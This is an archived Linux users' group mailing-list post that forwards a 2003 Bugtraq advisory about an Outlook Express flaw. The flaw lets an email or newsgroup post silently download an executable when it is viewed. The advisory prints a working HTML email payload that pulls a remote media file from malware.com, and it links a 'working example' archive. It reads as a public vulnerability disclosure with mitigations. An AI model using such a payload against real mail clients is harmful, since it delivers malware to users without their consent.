l i n u x - u s e r s - g r o u p - o f - d a v i s
L U G O D
 
Next Meeting:
January 6: Social gathering
Next Installfest:
TBD
Latest News:
Nov. 18: Club officer elections
Page last updated:
2003 May 21 18:34

The following is an archive of a post made to our 'vox mailing list' by one of its subscribers.

Report this post as spam:

(Enter your email address)
[vox] OT: [Fwd: Restricted Zone: the OUTLOOK EXPRESS]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[vox] OT: [Fwd: Restricted Zone: the OUTLOOK EXPRESS]



Yet another reason to avoid MS products like "Look Out!" Express.



---------------------------- Original Message ----------------------------
Subject: Restricted Zone: the OUTLOOK EXPRESS
From:    "http-equiv@excite.com" <1@malware.com>
Date:    Wed, May 21, 2003 4:55
To:      bugtraq@securityfocus.com
         NTBugtraq@listserv.ntbugtraq.com
--------------------------------------------------------------------------



Tuesday, 20 May, 2003


Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup  post.

This can be achieved with the default setting of Outlook Express: 
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work.  But
it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf";  />
</body></html>

What that does is invoke our freakish media file including our trusty  and
battle-hardened 0s URL flip from within the html of an email or  newsgroup
post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according  to
plan. Specifically audio + *.asf. Our 0s URL flip points to our  file on
the remote server and automatically forces our download as  instructed.
Couple that with the most recent flood-like functionality  of the iframe:
http://www.securityfocus.com/archive/1/321662 and
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip


Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability ':
http://www.securityfocus.com/bid/4343 which appears to never have  been
patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from
untrustworthy sources


End Call


-- 
http://www.malware.com





_______________________________________________
vox mailing list
vox@lists.lugod.org
http://lists.lugod.org/mailman/listinfo/vox



LinkedIn
LUGOD Group on LinkedIn
Sign up for LUGOD event announcements
Your email address:
facebook
LUGOD Group on Facebook
'Like' LUGOD on Facebook:

Hosting provided by:
Sunset Systems
Sunset Systems offers preconfigured Linux systems, remote system administration and custom software development.

LUGOD: Linux Users' Group of Davis
PO Box 2082, Davis, CA 95617
Contact Us

LUGOD is a 501(c)7 non-profit organization
based in Davis, California
and serving the Sacramento area.
"Linux" is a trademark of Linus Torvalds.

Sponsored in part by:
EDGE Tech Corp.
For donating some give-aways for our meetings.